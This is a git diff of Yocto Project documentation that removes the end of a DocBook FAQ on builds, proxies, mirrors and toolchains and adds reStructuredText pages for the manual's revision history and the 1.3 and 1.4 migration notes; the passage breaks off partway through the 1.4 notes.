- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- </para>
- <para>
- Usually, if the board is not completely exotic, adding support in
- the Yocto Project is fairly straightforward.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- Are there any products built using the OpenEmbedded build system?
- </para>
- </question>
- <answer>
- <para>
- The software running on the <ulink url='http://vernier.com/labquest/'>Vernier LabQuest</ulink>
- is built using the OpenEmbedded build system.
- See the <ulink url='http://www.vernier.com/products/interfaces/labq/'>Vernier LabQuest</ulink>
- website for more information.
- There are a number of pre-production devices using the OpenEmbedded build system
- and the Yocto Project team
- announces them as soon as they are released.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- What does the OpenEmbedded build system produce as output?
- </para>
- </question>
- <answer>
- <para>
- Because you can use the same set of recipes to create output of
- various formats, the output of an OpenEmbedded build depends on
- how you start it.
- Usually, the output is a flashable image ready for the target
- device.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I add my package to the Yocto Project?
- </para>
- </question>
- <answer>
- <para>
- To add a package, you need to create a BitBake recipe.
- For information on how to create a BitBake recipe, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-writing-a-new-recipe'>Writing a New Recipe</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- Do I have to reflash my entire board with a new Yocto Project image when recompiling
- a package?
- </para>
- </question>
- <answer>
- <para>
- The OpenEmbedded build system can build packages in various
- formats such as IPK for OPKG, Debian package
- (<filename>.deb</filename>), or RPM.
- You can then upgrade the packages using the package tools on
- the device, much like on a desktop distribution such as
- Ubuntu or Fedora.
- However, package management on the target is entirely optional.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- I see the error '<filename>chmod: XXXXX new permissions are r-xrwxrwx, not r-xr-xr-x</filename>'.
- What is wrong?
- </para>
- </question>
- <answer>
- <para>
- You are probably running the build on an NTFS filesystem.
- Use <filename>ext2</filename>, <filename>ext3</filename>, or <filename>ext4</filename> instead.
- </para>
- </answer>
- </qandaentry>
-
-<!-- <qandaentry>
- <question>
- <para>
- How do I make the Yocto Project work in RHEL/CentOS?
- </para>
- </question>
- <answer>
- <para>
- To get the Yocto Project working under RHEL/CentOS 5.1 you need to first
- install some required packages.
- The standard CentOS packages needed are:
- <itemizedlist>
- <listitem><para>"Development tools" (selected during installation)</para></listitem>
- <listitem><para><filename>texi2html</filename></para></listitem>
- <listitem><para><filename>compat-gcc-34</filename></para></listitem>
- </itemizedlist>
- On top of these, you need the following external packages:
- <itemizedlist>
- <listitem><para><filename>python-sqlite2</filename> from
- <ulink url='http://dag.wieers.com/rpm/packages/python-sqlite2/'>DAG repository</ulink>
- </para></listitem>
- <listitem><para><filename>help2man</filename> from
- <ulink url='http://centos.karan.org/el4/extras/stable/x86_64/RPMS/repodata/repoview/help2man-0-1.33.1-2.html'>Karan repository</ulink></para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Once these packages are installed, the OpenEmbedded build system will be able
- to build standard images.
- However, there might be a problem with the QEMU emulator segfaulting.
- You can either disable the generation of binary locales by setting
- <filename><link linkend='var-ENABLE_BINARY_LOCALE_GENERATION'>ENABLE_BINARY_LOCALE_GENERATION</link>
- </filename> to "0" or by removing the <filename>linux-2.6-execshield.patch</filename>
- from the kernel and rebuilding it since that is the patch that causes the problems with QEMU.
- </para>
-
- <note>
- <para>For information on distributions that the Yocto Project
- uses during validation, see the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Distribution_Support'>Distribution Support</ulink>
- Wiki page.</para>
- <para>For notes about using the Yocto Project on a RHEL 4-based
- host, see the
- <ulink url='&YOCTO_WIKI_URL;/wiki/BuildingOnRHEL4'>Building on RHEL4</ulink>
- Wiki page.</para>
- </note>
- </answer>
- </qandaentry> -->
-
- <qandaentry>
- <question>
- <para>
- I see lots of 404 responses for files when the OpenEmbedded
- build system is trying to download sources.
- Is something wrong?
- </para>
- </question>
- <answer>
- <para>
- Nothing is wrong.
- The OpenEmbedded build system checks any configured source mirrors before downloading
- from the upstream sources.
- The build system does this searching for both source archives and
- pre-checked out versions of SCM-managed software.
- These checks help in large installations because it can reduce load on the SCM servers
- themselves.
- The address above is one of the default mirrors configured into the
- build system.
- Consequently, if an upstream source disappears, the team
- can place sources there so builds continue to work.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- I have machine-specific data in a package for one machine only but the package is
- being marked as machine-specific in all cases, how do I prevent this?
- </para>
- </question>
- <answer>
- <para>
- Set <filename><link linkend='var-SRC_URI_OVERRIDES_PACKAGE_ARCH'>SRC_URI_OVERRIDES_PACKAGE_ARCH</link>
- </filename> = "0" in the <filename>.bb</filename> file but make sure the package is
- manually marked as
- machine-specific for the case that needs it.
- The code that handles
- <filename>SRC_URI_OVERRIDES_PACKAGE_ARCH</filename> is in
- the <filename>meta/classes/base.bbclass</filename> file.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para id='i-am-behind-a-firewall-and-need-to-use-a-proxy-server'>
- I'm behind a firewall and need to use a proxy server. How do I do that?
- </para>
- </question>
- <answer>
- <para>
- Most source fetching by the OpenEmbedded build system is done
- by <filename>wget</filename> and you therefore need to specify
- the proxy settings in a <filename>.wgetrc</filename> file,
- which can be in your home directory if you are a single user
- or can be in <filename>/usr/local/etc/wgetrc</filename> as
- a global user file.
- </para>
-
- <para>
- Following is the applicable code for setting various proxy
- types in the <filename>.wgetrc</filename> file.
- By default, these settings are disabled with comments.
- To use them, remove the comments:
- <literallayout class='monospaced'>
- # You can set the default proxies for Wget to use for http, https, and ftp.
- # They will override the value in the environment.
- #https_proxy = http://proxy.yoyodyne.com:18023/
- #http_proxy = http://proxy.yoyodyne.com:18023/
- #ftp_proxy = http://proxy.yoyodyne.com:18023/
-
- # If you do not want to use proxy at all, set this to off.
- #use_proxy = on
- </literallayout>
- The Yocto Project also includes a
- <filename>meta-poky/conf/site.conf.sample</filename> file that
- shows how to configure CVS and Git proxy servers if needed.
- For more information on setting up various proxy types and
- configuring proxy servers, see the
- "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
- Wiki page.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- What’s the difference between <replaceable>target</replaceable> and <replaceable>target</replaceable><filename>-native</filename>?
- </para>
- </question>
- <answer>
- <para>
- The <filename>*-native</filename> targets are designed to run on the system
- being used for the build.
- These are usually tools that are needed to assist the build in some way such as
- <filename>quilt-native</filename>, which is used to apply patches.
- The non-native version is the one that runs on the target device.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- I'm seeing random build failures. Help?!
- </para>
- </question>
- <answer>
- <para>
- If the same build is failing in totally different and random
- ways, the most likely explanation is:
- <itemizedlist>
- <listitem><para>The hardware you are running the build on
- has some problem.</para></listitem>
- <listitem><para>You are running the build under
- virtualization, in which case the virtualization
- probably has bugs.</para></listitem>
- </itemizedlist>
- The OpenEmbedded build system processes a massive amount of
- data that causes lots of network, disk and CPU activity and
- is sensitive to even single-bit failures in any of these areas.
- True random failures have always been traced back to hardware
- or virtualization issues.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- When I try to build a native recipe, the build fails with <filename>iconv.h</filename> problems.
- </para>
- </question>
- <answer>
- <para>
- If you get an error message that indicates GNU
- <filename>libiconv</filename> is not in use but
- <filename>iconv.h</filename> has been included from
- <filename>libiconv</filename>, you need to check to see if
- you have a previously installed version of the header file
- in <filename>/usr/local/include</filename>.
- <literallayout class='monospaced'>
- #error GNU libiconv not in use but included iconv.h is from libiconv
- </literallayout>
- If you find a previously installed file, you should either
- uninstall it or temporarily rename it and try the build again.
- </para>
-
- <para>
- This issue is just a single manifestation of "system
- leakage" issues caused when the OpenEmbedded build system
- finds and uses previously installed files during a native
- build.
- This type of issue might not be limited to
- <filename>iconv.h</filename>.
- Be sure that leakage cannot occur from
- <filename>/usr/local/include</filename> and
- <filename>/opt</filename> locations.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- What do we need to ship for license compliance?
- </para>
- </question>
- <answer>
- <para>
- This is a difficult question and you need to consult your lawyer
- for the answer for your specific case.
- It is worth bearing in mind that for GPL compliance, there needs
- to be enough information shipped to allow someone else to
- rebuild and produce the same end result you are shipping.
- This means sharing the source code, any patches applied to it,
- and also any configuration information about how that package
- was configured and built.
- </para>
-
- <para>
- You can find more information on licensing in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#licensing'>Licensing</ulink>"
- section in the Yocto Project Overview and Concepts Manual
- and also in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I disable the cursor on my touchscreen device?
- </para>
- </question>
- <answer>
- <para>
- You need to create a form factor file as described in the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout-misc-recipes'>Miscellaneous BSP-Specific Recipe Files</ulink>"
- section in the Yocto Project Board Support Packages (BSP)
- Developer's Guide.
- Set the <filename>HAVE_TOUCHSCREEN</filename> variable equal to
- one as follows:
- <literallayout class='monospaced'>
- HAVE_TOUCHSCREEN=1
- </literallayout>
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I make sure connected network interfaces are brought up by default?
- </para>
- </question>
- <answer>
- <para>
- The default interfaces file provided by the netbase recipe does not
- automatically bring up network interfaces.
- Therefore, you will need to add a BSP-specific netbase that includes an interfaces
- file.
- See the "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout-misc-recipes'>Miscellaneous BSP-Specific Recipe Files</ulink>"
- section in the Yocto Project Board Support Packages (BSP)
- Developer's Guide for information on creating these types of
- miscellaneous recipe files.
- </para>
- <para>
- For example, add the following files to your layer:
- <literallayout class='monospaced'>
- meta-MACHINE/recipes-bsp/netbase/netbase/MACHINE/interfaces
- meta-MACHINE/recipes-bsp/netbase/netbase_5.0.bbappend
- </literallayout>
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I create images with more free space?
- </para>
- </question>
- <answer>
- <para>
- By default, the OpenEmbedded build system creates images
- that are 1.3 times the size of the populated root filesystem.
- To affect the image size, you need to set various
- configurations:
- <itemizedlist>
- <listitem><para><emphasis>Image Size:</emphasis>
- The OpenEmbedded build system uses the
- <link linkend='var-IMAGE_ROOTFS_SIZE'><filename>IMAGE_ROOTFS_SIZE</filename></link>
- variable to define the size of the image in Kbytes.
- The build system determines the size by taking into
- account the initial root filesystem size before any
- modifications such as requested size for the image and
- any requested additional free disk space to be
- added to the image.</para></listitem>
- <listitem><para><emphasis>Overhead:</emphasis>
- Use the
- <link linkend='var-IMAGE_OVERHEAD_FACTOR'><filename>IMAGE_OVERHEAD_FACTOR</filename></link>
- variable to define the multiplier that the build system
- applies to the initial image size, which is 1.3 by
- default.</para></listitem>
- <listitem><para><emphasis>Additional Free Space:</emphasis>
- Use the
- <link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'><filename>IMAGE_ROOTFS_EXTRA_SPACE</filename></link>
- variable to add additional free space to the image.
- The build system adds this space to the image after
- it determines its
- <filename>IMAGE_ROOTFS_SIZE</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- Why don't you support directories with spaces in the pathnames?
- </para>
- </question>
- <answer>
- <para>
- The Yocto Project team has tried to do this before but too
- many of the tools the OpenEmbedded build system depends on,
- such as <filename>autoconf</filename>, break when they find
- spaces in pathnames.
- Until that situation changes, the team will not support spaces
- in pathnames.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I use an external toolchain?
- </para>
- </question>
- <answer>
- <para>
- The toolchain configuration is very flexible and customizable.
- It is primarily controlled with the
- <filename><link linkend='var-TCMODE'>TCMODE</link></filename>
- variable.
- This variable controls which <filename>tcmode-*.inc</filename>
- file to include from the
- <filename>meta/conf/distro/include</filename> directory within
- the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
-
- <para>
- The default value of <filename>TCMODE</filename> is "default",
- which tells the OpenEmbedded build system to use its internally
- built toolchain (i.e. <filename>tcmode-default.inc</filename>).
- However, other patterns are accepted.
- In particular, "external-*" refers to external toolchains.
- One example is the Sourcery G++ Toolchain.
- The support for this toolchain resides in the separate
- <filename>meta-sourcery</filename> layer at
- <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
- </para>
-
- <para>
- In addition to the toolchain configuration, you also need a
- corresponding toolchain recipe file.
- This recipe file needs to package up any pre-built objects in
- the toolchain such as <filename>libgcc</filename>,
- <filename>libstdcc++</filename>, any locales, and
- <filename>libc</filename>.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para id='how-does-the-yocto-project-obtain-source-code-and-will-it-work-behind-my-firewall-or-proxy-server'>
- How does the OpenEmbedded build system obtain source code and
- will it work behind my firewall or proxy server?
- </para>
- </question>
- <answer>
- <para>
- The way the build system obtains source code is highly
- configurable.
- You can setup the build system to get source code in most
- environments if HTTP transport is available.
- </para>
- <para>
- When the build system searches for source code, it first
- tries the local download directory.
- If that location fails, Poky tries
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
- the upstream source, and then
- <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
- in that order.
- </para>
- <para>
- Assuming your distribution is "poky", the OpenEmbedded build
- system uses the Yocto Project source
- <filename>PREMIRRORS</filename> by default for SCM-based
- sources, upstreams for normal tarballs, and then falls back
- to a number of other mirrors including the Yocto Project
- source mirror if those fail.
- </para>
- <para>
- As an example, you could add a specific server for the
- build system to attempt before any others by adding something
- like the following to the <filename>local.conf</filename>
- configuration file:
- <literallayout class='monospaced'>
- PREMIRRORS_prepend = "\
- git://.*/.* http://www.yoctoproject.org/sources/ \n \
- ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
- http://.*/.* http://www.yoctoproject.org/sources/ \n \
- https://.*/.* http://www.yoctoproject.org/sources/ \n"
- </literallayout>
- </para>
- <para>
- These changes cause the build system to intercept Git, FTP,
- HTTP, and HTTPS requests and direct them to the
- <filename>http://</filename> sources mirror.
- You can use <filename>file://</filename> URLs to point to
- local directories or network shares as well.
- </para>
- <para>
- Aside from the previous technique, these options also exist:
- <literallayout class='monospaced'>
- BB_NO_NETWORK = "1"
- </literallayout>
- This statement tells BitBake to issue an error instead of
- trying to access the Internet.
- This technique is useful if you want to ensure code builds
- only from local sources.
- </para>
- <para>
- Here is another technique:
- <literallayout class='monospaced'>
- BB_FETCH_PREMIRRORONLY = "1"
- </literallayout>
- This statement limits the build system to pulling source
- from the <filename>PREMIRRORS</filename> only.
- Again, this technique is useful for reproducing builds.
- </para>
- <para>
- Here is another technique:
- <literallayout class='monospaced'>
- BB_GENERATE_MIRROR_TARBALLS = "1"
- </literallayout>
- This statement tells the build system to generate mirror
- tarballs.
- This technique is useful if you want to create a mirror server.
- If not, however, the technique can simply waste time during
- the build.
- </para>
- <para>
- Finally, consider an example where you are behind an
- HTTP-only firewall.
- You could make the following changes to the
- <filename>local.conf</filename> configuration file as long as
- the <filename>PREMIRRORS</filename> server is current:
- <literallayout class='monospaced'>
- PREMIRRORS_prepend = "\
- ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
- http://.*/.* http://www.yoctoproject.org/sources/ \n \
- https://.*/.* http://www.yoctoproject.org/sources/ \n"
- BB_FETCH_PREMIRRORONLY = "1"
- </literallayout>
- These changes would cause the build system to successfully
- fetch source over HTTP and any network accesses to anything
- other than the <filename>PREMIRRORS</filename> would fail.
- </para>
- <para>
- The build system also honors the standard shell environment
- variables <filename>http_proxy</filename>,
- <filename>ftp_proxy</filename>,
- <filename>https_proxy</filename>, and
- <filename>all_proxy</filename> to redirect requests through
- proxy servers.
- </para>
- <note>
- You can find more information on the
- "<ulink url='&YOCTO_WIKI_URL;/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
- Wiki page.
- </note>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- Can I get rid of build output so I can start over?
- </para>
- </question>
- <answer>
- <para>
- Yes - you can easily do this.
- When you use BitBake to build an image, all the build output
- goes into the directory created when you run the
- build environment setup script (i.e.
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
- By default, this
- <link linkend='build-directory'>Build Directory</link>
- is named <filename>build</filename> but can be named
- anything you want.
- </para>
-
- <para>
- Within the Build Directory, is the <filename>tmp</filename>
- directory.
- To remove all the build output yet preserve any source code or
- downloaded files from previous builds, simply remove the
- <filename>tmp</filename> directory.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- Why do <filename>${bindir}</filename> and <filename>${libdir}</filename> have strange values for <filename>-native</filename> recipes?
- </para>
- </question>
- <answer>
- <para>
- Executables and libraries might need to be used from a
- directory other than the directory into which they were
- initially installed.
- Complicating this situation is the fact that sometimes these
- executables and libraries are compiled with the expectation
- of being run from that initial installation target directory.
- If this is the case, moving them causes problems.
- </para>
-
- <para>
- This scenario is a fundamental problem for package maintainers
- of mainstream Linux distributions as well as for the
- OpenEmbedded build system.
- As such, a well-established solution exists.
- Makefiles, Autotools configuration scripts, and other build
- systems are expected to respect environment variables such as
- <filename>bindir</filename>, <filename>libdir</filename>,
- and <filename>sysconfdir</filename> that indicate where
- executables, libraries, and data reside when a program is
- actually run.
- They are also expected to respect a
- <filename>DESTDIR</filename> environment variable, which is
- prepended to all the other variables when the build system
- actually installs the files.
- It is understood that the program does not actually run from
- within <filename>DESTDIR</filename>.
- </para>
-
- <para>
- When the OpenEmbedded build system uses a recipe to build a
- target-architecture program (i.e. one that is intended for
- inclusion on the image being built), that program eventually
- runs from the root file system of that image.
- Thus, the build system provides a value of "/usr/bin" for
- <filename>bindir</filename>, a value of "/usr/lib" for
- <filename>libdir</filename>, and so forth.
- </para>
-
- <para>
- Meanwhile, <filename>DESTDIR</filename> is a path within the
- <link linkend='build-directory'>Build Directory</link>.
- However, when the recipe builds a native program (i.e. one
- that is intended to run on the build machine), that program
- is never installed directly to the build machine's root
- file system.
- Consequently, the build system uses paths within the Build
- Directory for <filename>DESTDIR</filename>,
- <filename>bindir</filename> and related variables.
- To better understand this, consider the following two paths
- where the first is relatively normal and the second is not:
- <note>
- Due to these lengthy examples, the paths are artificially
- broken across lines for readability.
- </note>
- <literallayout class='monospaced'>
- /home/maxtothemax/poky-bootchart2/build/tmp/work/i586-poky-linux/zlib/
- 1.2.8-r0/sysroot-destdir/usr/bin
-
- /home/maxtothemax/poky-bootchart2/build/tmp/work/x86_64-linux/
- zlib-native/1.2.8-r0/sysroot-destdir/home/maxtothemax/poky-bootchart2/
- build/tmp/sysroots/x86_64-linux/usr/bin
- </literallayout>
- Even if the paths look unusual, they both are correct -
- the first for a target and the second for a native recipe.
- These paths are a consequence of the
- <filename>DESTDIR</filename> mechanism and while they
- appear strange, they are correct and in practice very effective.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- The files provided by my <filename>*-native</filename> recipe do
- not appear to be available to other recipes.
- Files are missing from the native sysroot, my recipe is
- installing to the wrong place, or I am getting permissions
- errors during the do_install task in my recipe! What is wrong?
- </para>
- </question>
- <answer>
- <para>
- This situation results when a build system does
- not recognize the environment variables supplied to it by
- <link linkend='bitbake-term'>BitBake</link>.
- The incident that prompted this FAQ entry involved a Makefile
- that used an environment variable named
- <filename>BINDIR</filename> instead of the more standard
- variable <filename>bindir</filename>.
- The makefile's hardcoded default value of "/usr/bin" worked
- most of the time, but not for the recipe's
- <filename>-native</filename> variant.
- For another example, permissions errors might be caused
- by a Makefile that ignores <filename>DESTDIR</filename> or uses
- a different name for that environment variable.
- Check the the build system to see if these kinds of
- issues exist.
- </para>
- </answer>
- </qandaentry>
-
-</qandaset>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/history.rst b/documentation/ref-manual/history.rst
new file mode 100644
index 0000000000..04d6b096cf
--- /dev/null
+++ b/documentation/ref-manual/history.rst
@@ -0,0 +1,86 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 0.9
+ - November 2010
+ - The initial document released with the Yocto Project 0.9 Release
+ * - 1.0
+ - April 2011
+ - Released with the Yocto Project 1.0 Release.
+ * - 1.1
+ - October 2011
+ - Released with the Yocto Project 1.1 Release.
+ * - 1.2
+ - April 2012
+ - Released with the Yocto Project 1.2 Release.
+ * - 1.3
+ - October 2012
+ - Released with the Yocto Project 1.3 Release.
+ * - 1.4
+ - April 2013
+ - Released with the Yocto Project 1.4 Release.
+ * - 1.5
+ - October 2013
+ - Released with the Yocto Project 1.5 Release.
+ * - 1.6
+ - April 2014
+ - Released with the Yocto Project 1.6 Release.
+ * - 1.7
+ - October 2014
+ - Released with the Yocto Project 1.7 Release.
+ * - 1.8
+ - April 2015
+ - Released with the Yocto Project 1.8 Release.
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/ref-manual/migration-1.3.rst b/documentation/ref-manual/migration-1.3.rst
new file mode 100644
index 0000000000..5f975850ba
--- /dev/null
+++ b/documentation/ref-manual/migration-1.3.rst
@@ -0,0 +1,195 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Moving to the Yocto Project 1.3 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.3 Release from the prior release.
+
+.. _1.3-local-configuration:
+
+Local Configuration
+-------------------
+
+Differences include changes for
+:term:`SSTATE_MIRRORS` and ``bblayers.conf``.
+
+.. _migration-1.3-sstate-mirrors:
+
+SSTATE_MIRRORS
+~~~~~~~~~~~~~~
+
+The shared state cache (sstate-cache), as pointed to by
+:term:`SSTATE_DIR`, by default now has two-character
+subdirectories to prevent issues arising from too many files in the same
+directory. Also, native sstate-cache packages, which are built to run on
+the host system, will go into a subdirectory named using the distro ID
+string. If you copy the newly structured sstate-cache to a mirror
+location (either local or remote) and then point to it in
+:term:`SSTATE_MIRRORS`, you need to append "PATH"
+to the end of the mirror URL so that the path used by BitBake before the
+mirror substitution is appended to the path used to access the mirror.
+Here is an example: ::
+
+ SSTATE_MIRRORS = "file://.* http://someserver.tld/share/sstate/PATH"
+
+.. _migration-1.3-bblayers-conf:
+
+bblayers.conf
+~~~~~~~~~~~~~
+
+The ``meta-yocto`` layer consists of two parts that correspond to the
+Poky reference distribution and the reference hardware Board Support
+Packages (BSPs), respectively: ``meta-yocto`` and ``meta-yocto-bsp``.
+When running BitBake for the first time after upgrading, your
+``conf/bblayers.conf`` file will be updated to handle this change and
+you will be asked to re-run or restart for the changes to take effect.
+
+.. _1.3-recipes:
+
+Recipes
+-------
+
+Differences include changes for the following:
+
+.. _migration-1.3-python-function-whitespace:
+
+Python Function Whitespace
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+All Python functions must now use four spaces for indentation.
+Previously, an inconsistent mix of spaces and tabs existed, which made
+extending these functions using ``_append`` or ``_prepend`` complicated
+given that Python treats whitespace as syntactically significant. If you
+are defining or extending any Python functions (e.g.
+``populate_packages``, ``do_unpack``, ``do_patch`` and so forth) in
+custom recipes or classes, you need to ensure you are using consistent
+four-space indentation.
+
+.. _migration-1.3-proto=-in-src-uri:
+
+proto= in SRC_URI
+~~~~~~~~~~~~~~~~~
+
+Any use of ``proto=`` in :term:`SRC_URI` needs to be
+changed to ``protocol=``. In particular, this applies to the following
+URIs:
+
+- ``svn://``
+
+- ``bzr://``
+
+- ``hg://``
+
+- ``osc://``
+
+Other URIs were already using ``protocol=``. This change improves
+consistency.
+
+.. _migration-1.3-nativesdk:
+
+nativesdk
+~~~~~~~~~
+
+The suffix ``nativesdk`` is now implemented as a prefix, which
+simplifies a lot of the packaging code for ``nativesdk`` recipes. All
+custom ``nativesdk`` recipes, which are relocatable packages that are
+native to :term:`SDK_ARCH`, and any references need to
+be updated to use ``nativesdk-*`` instead of ``*-nativesdk``.
+
+.. _migration-1.3-task-recipes:
+
+Task Recipes
+~~~~~~~~~~~~
+
+"Task" recipes are now known as "Package groups" and have been renamed
+from ``task-*.bb`` to ``packagegroup-*.bb``. Existing references to the
+previous ``task-*`` names should work in most cases as there is an
+automatic upgrade path for most packages. However, you should update
+references in your own recipes and configurations as they could be
+removed in future releases. You should also rename any custom ``task-*``
+recipes to ``packagegroup-*``, and change them to inherit
+``packagegroup`` instead of ``task``, as well as taking the opportunity
+to remove anything now handled by ``packagegroup.bbclass``, such as
+providing ``-dev`` and ``-dbg`` packages, setting
+:term:`LIC_FILES_CHKSUM`, and so forth. See the
+":ref:`packagegroup.bbclass <ref-classes-packagegroup>`" section for
+further details.
+
+.. _migration-1.3-image-features:
+
+IMAGE_FEATURES
+~~~~~~~~~~~~~~
+
+Image recipes that previously included ``apps-console-core`` in
+:term:`IMAGE_FEATURES` should now include ``splash``
+instead to enable the boot-up splash screen. Retaining
+``apps-console-core`` will still include the splash screen but generates a
+warning. The ``apps-x11-core`` and ``apps-x11-games`` ``IMAGE_FEATURES``
+features have been removed.
+
+.. _migration-1.3-removed-recipes:
+
+Removed Recipes
+~~~~~~~~~~~~~~~
+
+The following recipes have been removed. For most of them, it is
+unlikely that you would have any references to them in your own
+:term:`Metadata`. However, you should check your metadata
+against this list to be sure:
+
+- ``libx11-trim``: Replaced by ``libx11``, which has a negligible
+ size difference with modern Xorg.
+
+- ``xserver-xorg-lite``: Use ``xserver-xorg``, which has a negligible
+ size difference when DRI and GLX modules are not installed.
+
+- ``xserver-kdrive``: Effectively unmaintained for many years.
+
+- ``mesa-xlib``: No longer serves any purpose.
+
+- ``galago``: Replaced by telepathy.
+
+- ``gail``: Functionality was integrated into GTK+ 2.13.
+
+- ``eggdbus``: No longer needed.
+
+- ``gcc-*-intermediate``: The build has been restructured to avoid
+ the need for this step.
+
+- ``libgsmd``: Unmaintained for many years. Functionality now
+ provided by ``ofono`` instead.
+
+- *contacts, dates, tasks, eds-tools*: Largely unmaintained PIM
+ application suite. It has been moved to ``meta-gnome`` in
+ ``meta-openembedded``.
+
+In addition to the previously listed changes, the ``meta-demoapps``
+directory has also been removed because the recipes in it were not being
+maintained and many had become obsolete or broken. Additionally, these
+recipes were not parsed in the default configuration. Many of these
+recipes are already provided in an updated and maintained form within
+the OpenEmbedded community layers such as ``meta-oe`` and
+``meta-gnome``. For the remainder, you can now find them in the
+``meta-extras`` repository, which is in the
+:yocto_git:`Source Repositories <>` at
+:yocto_git:`/cgit/cgit.cgi/meta-extras/`.
+
+.. _1.3-linux-kernel-naming:
+
+Linux Kernel Naming
+-------------------
+
+The naming scheme for kernel output binaries has been changed to now
+include :term:`PE` as part of the filename:
+::
+
+ KERNEL_IMAGE_BASE_NAME ?= "${KERNEL_IMAGETYPE}-${PE}-${PV}-${PR}-${MACHINE}-${DATETIME}"
+
+Because the ``PE`` variable is not set by default, these binary files
+could result with names that include two dash characters. Here is an
+example: ::
+
+ bzImage--3.10.9+git0+cd502a8814_7144bcc4b8-r0-qemux86-64-20130830085431.bin
+
+
diff --git a/documentation/ref-manual/migration-1.4.rst b/documentation/ref-manual/migration-1.4.rst
new file mode 100644
index 0000000000..daaea0ffa2
--- /dev/null
+++ b/documentation/ref-manual/migration-1.4.rst
@@ -0,0 +1,237 @@
+Moving to the Yocto Project 1.4 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.4 Release from the prior release.
+
+.. _migration-1.4-bitbake:
+
+BitBake
+-------
+
+Differences include the following:
+
+- *Comment Continuation:* If a comment ends with a line continuation
+ (\\) character, then the next line must also be a comment. Any
+ instance where this is not the case, now triggers a warning. You must
+ either remove the continuation character, or be sure the next line is
+ a comment.
+
+- *Package Name Overrides:* The runtime package specific variables
+ :term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`,
+ :term:`RPROVIDES`,
+ :term:`RCONFLICTS`,
+ :term:`RREPLACES`, :term:`FILES`,
